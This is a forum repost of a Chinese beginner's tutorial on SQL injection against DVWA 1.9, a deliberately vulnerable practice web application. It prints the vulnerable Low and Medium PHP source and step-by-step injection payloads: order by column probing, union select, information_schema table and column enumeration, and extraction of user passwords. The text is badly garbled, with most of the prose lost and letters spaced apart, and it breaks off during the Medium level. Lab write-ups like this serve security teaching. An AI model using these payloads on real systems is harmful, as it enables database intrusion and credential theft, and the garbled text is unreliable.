搜索

[10765] 2016-11-27_新手指南:DVWA-1.9全级别教程之SQLInjection

文档创建者:s7ckTeam
浏览次数:9
最后更新:2025-01-18
2016-11-27_新手指南:DVWA-1.9全级别教程之SQLInjection D V W A - 1 . 9 S Q L   I n j e c t i o n l o n e h a n d   F r e e B u f   2 0 1 6 - 1 1 - 2 7 D V W A 1 . 9 D V W A   h i g h D V W A D V W A D V W A D a m n   V u l n e r a b l e   W e b   A p p l i c a t i o n P H P / M y S Q L   W e b w e b w e b D V W A B r u t e   F o r c e C o m m a n d   I n j e c t i o n C S R F F i l e   I n c l u s i o n F i l e   U p l o a d I n s e c u r e   C A P T C H A   S Q L   I n j e c t i o n S Q L S Q L   I n j e c t i o n B l i n d S Q L X S S R e f l e c t e d X S S S t o r e d D V W A   1 . 9 L o w M e d i u m H i g h I m p o s s i b l e P H P D V W A D V W A
F r e e b u f h t t p : / / w w w . f r e e b u f . c o m / s e c t o o l / 1 0 2 6 6 1 . h t m l B r u t e   F o r c e C o m m a n d   I n j e c t i o n C S R F F i l e   I n c l u s i o n F i l e   U p l o a d I n s e c u r e   C A P T C H A S Q L   I n j e c t i o n S Q L   I n j e c t i o n S Q L   I n j e c t i o n S Q L   I n j e c t i o n S Q L S Q L S Q L S Q L S Q L S Q L W e b 使 S Q L s q l m a p 1 . 2 . S Q L 3 . 4 . 5 . 6 . 7 . L o w L o w < ? p h p  
i f (   i s s e t (   $ _ R E Q U E S T [   ' S u b m i t '   ]   )   )   {           / /   G e t   i n p u t           $ i d   =   $ _ R E Q U E S T [   ' i d '   ] ;           / /   C h e c k   d a t a b a s e           $ q u e r y     =   " S E L E C T   f i r s t _ n a m e ,   l a s t _ n a m e   F R O M   u s e r s   W H E R E   u s e r _ i d   =   ' $ i d ' ; " ;           $ r e s u l t   =   m y s q l _ q u e r y (   $ q u e r y   )   o r   d i e (   ' < p r e > '   .   m y s q l _ e r r o r ( )   .   ' < / p r e > '   ) ;           / /   G e t   r e s u l t s           $ n u m   =   m y s q l _ n u m r o w s (   $ r e s u l t   ) ;           $ i       =   0 ;           w h i l e (   $ i   <   $ n u m   )   {                   / /   G e t   v a l u e s                   $ f i r s t   =   m y s q l _ r e s u l t (   $ r e s u l t ,   $ i ,   " f i r s t _ n a m e "   ) ;                   $ l a s t     =   m y s q l _ r e s u l t (   $ r e s u l t ,   $ i ,   " l a s t _ n a m e "   ) ;                   / /   F e e d b a c k   f o r   e n d   u s e r                   e c h o   " < p r e > I D :   { $ i d } < b r   / > F i r s t   n a m e :   { $ f i r s t } < b r   / > S u r n a m e :   { $ l a s t } < / p r e > " ;                   / /   I n c r e a s e   l o o p   c o u n t                   $ i + + ;           }           m y s q l _ c l o s e ( ) ;   }   ? >   L o w i d S Q L 1 . 1
1 a n d   1   = 2 1 o r   1 2 3 4   = 1 2 3 4 2 . S Q L 1 '   o r   1 = 1   o r d e r   b y   1   #
1 '   o r   1 = 1   o r d e r   b y   2   # 1 '   o r   1 = 1   o r d e r   b y   3   # S Q L F i r s t   n a m e S u r n a m e u n i o n   s e l e c t   1 , 2 , 3 . . .
3 . 1 '   u n i o n   s e l e c t   1 , 2   # S Q L s e l e c t   F i r s t   n a m e , S u r n a m e   f r o m     w h e r e   I D = i d . . . 4 . 1 '   u n i o n   s e l e c t   1 , d a t a b a s e ( )   # d v w a 5 . 1 '   u n i o n   s e l e c t   1 , g r o u p _ c o n c a t ( t a b l e _ n a m e )   f r o m   i n f o r m a t i o n _ s c h e m a . t a b l e s   w h e r e   t a b l e _ s c h e m a = d a t a b a s e ( )   # d v w a g u e s t b o o k u s e r s 6 .
1 '   u n i o n   s e l e c t   1 , g r o u p _ c o n c a t ( c o l u m n _ n a m e )   f r o m   i n f o r m a t i o n _ s c h e m a . c o l u m n s   w h e r e   t a b l e _ n a m e = ' u s e r s '   # u s e r s 8 u s e r _ i d , f i r s t _ n a m e , l a s t _ n a m e , u s e r , p a s s w o r d , a v a t a r , l a s t _ l o g i n , f a i l e d _ l o g i n 7 . 1 '   o r   1 = 1   u n i o n   s e l e c t   g r o u p _ c o n c a t ( u s e r _ i d , f i r s t _ n a m e , l a s t _ n a m e ) , g r o u p _ c o n c a t ( p a s s w o r d )   f r o m   u s e r s   # u s e r s u s e r _ i d , f i r s t _ n a m e , l a s t _ n a m e , p a s s w o r d M e d i u m M e d i u m < ? p h p   i f (   i s s e t (   $ _ P O S T [   ' S u b m i t '   ]   )   )   {           / /   G e t   i n p u t           $ i d   =   $ _ P O S T [   ' i d '   ] ;           $ i d   =   m y s q l _ r e a l _ e s c a p e _ s t r i n g (   $ i d   ) ;           / /   C h e c k   d a t a b a s e           $ q u e r y     =   " S E L E C T   f i r s t _ n a m e ,   l a s t _ n a m e   F R O M   u s e r s   W H E R E   u s e r _ i d   =   $ i d ; " ;           $ r e s u l t   =   m y s q l _ q u e r y (   $ q u e r y   )   o r   d i e (   ' < p r e > '   .   m y s q l _ e r r o r ( )   .   ' < / p r e > '   ) ;  
        / /   G e t   r e s u l t s           $ n u m   =   m y s q l _ n u m r o w s (   $ r e s u l t   ) ;           $ i       =   0 ;           w h i l e (   $ i   <   $ n u m   )   {                   / /   D i s p l a y   v a l u e s                   $ f i r s t   =   m y s q l _ r e s u l t (   $ r e s u l t ,   $ i ,   " f i r s t _ n a m e "   ) ;                   $ l a s t     =   m y s q l _ r e s u l t (   $ r e s u l t ,   $ i ,   " l a s t _ n a m e "   ) ;                   / /   F e e d b a c k   f o r   e n d   u s e r                   e c h o   " < p r e > I D :   { $ i d } < b r   / > F i r s t   n a m e :   { $ f i r s t } < b r   / > S u r n a m e :   { $ l a s t } < / p r e > " ;                   / /   I n c r e a s e   l o o p   c o u n t                   $ i + + ;           }           / / m y s q l _ c l o s e ( ) ;   }   ? >   M e d i u m m y s q l _ r e a l _ e s c a p e _ s t r i n g x 0 0 , n , r , , ' , " , x 1 a 使 1 .
i d 1 '   o r   1 = 1   # i d 1   o r   1 = 1   # m y s q l _ r e a l _ e s c a p e _ s t r i n g 2 . S Q L
i d 1   o r d e r   b y   2   # i d 1   o r d e r   b y   3   # S Q L F i r s t   n a m e S u r n a m e 3 . i d 1   u n i o n   s e l e c t   1 , 2   # S Q L s e l e c t   F i r s t   n a m e , S u r n a m e   f r o m     w h e r e   I D = i d . . . 4 . i d 1   u n i o n   s e l e c t   1 , d a t a b a s e ( )   #
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理